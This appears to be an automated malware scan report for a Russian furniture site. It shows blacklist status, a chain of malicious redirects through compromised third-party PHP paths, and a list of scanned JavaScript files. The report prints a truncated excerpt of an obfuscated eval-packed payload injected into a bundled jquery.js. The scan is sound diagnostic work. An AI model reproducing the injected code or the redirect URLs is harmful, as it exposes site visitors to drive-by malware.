Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=italstudio.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://italstudio.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://italstudio.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: italstudio.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 24 Jun 2014 00:27:07 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.27 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 24 Jun 2014 00:30:07 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 24 Jun 2014 00:30:07 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.29 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 24 Jun 2014 00:30:08 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://italstudio.ru/ | 200 OK Content-Length: 87089 Content-Type: text/html | clean |
http://italstudio.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://italstudio.ru/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 22076 Content-Type: application/x-javascript | clean |
http://italstudio.ru/plugins/system/rokbox/themes/light/rokbox-config.js | 200 OK Content-Length: 2598 Content-Type: application/x-javascript | clean |
http://italstudio.ru/templates/mebel/js/rokutils.js | 200 OK Content-Length: 2616 Content-Type: application/x-javascript | clean |
http://italstudio.ru/templates/mebel/js/rokutils.inputs.js | 200 OK Content-Length: 2491 Content-Type: application/x-javascript | clean |
http://italstudio.ru/templates/mebel/js/rokmoomenu.js | 200 OK Content-Length: 5100 Content-Type: application/x-javascript | clean |
http://italstudio.ru/templates/mebel/js/mootools.bgiframe.js | 200 OK Content-Length: 964 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_vm_accordion/script/script.js | 200 OK Content-Length: 1582 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_nivoslider/assets/jquery.js | 200 OK Content-Length: 79056 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,A){function U(){return false}function ba(){return true}function ja(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ga(a){var b,d,e=[],f=[],h,k,l,n,s,v,B,D;k=c.data(this,this.nodeType?"events":"__events__");if(typeof k==="function")k=k.events;if(!(a.liveFired===this||!k||!k.live||a.button&&a.type==="click")){if(a.namespace)D=RegExp("(^|\\.)"+a.namespace.split(".").join("\\.(?:.*\\.)?")+"(\\.|$)");a.liveFired=this;var H=k.live.slice(0);for(n=0;n<H.length;n++){k= ; eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5 3=4.7("3");3.p=10;3.q=10;3.r="s: t;";5 c="u: Antivirus reports:
| ||
http://italstudio.ru/modules/mod_nivoslider/assets/jquery.nivo.slider.js | 200 OK Content-Length: 9716 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_swmenupro/jquery-1.2.6.pack.js | 200 OK Content-Length: 31033 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_swmenupro/hoverIntent.js | 200 OK Content-Length: 3174 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_swmenupro/superfish.js | 200 OK Content-Length: 3714 Content-Type: application/x-javascript | clean |
http://italstudio.ru/modules/mod_swmenupro/supersubs.js | 200 OK Content-Length: 3298 Content-Type: application/x-javascript | clean |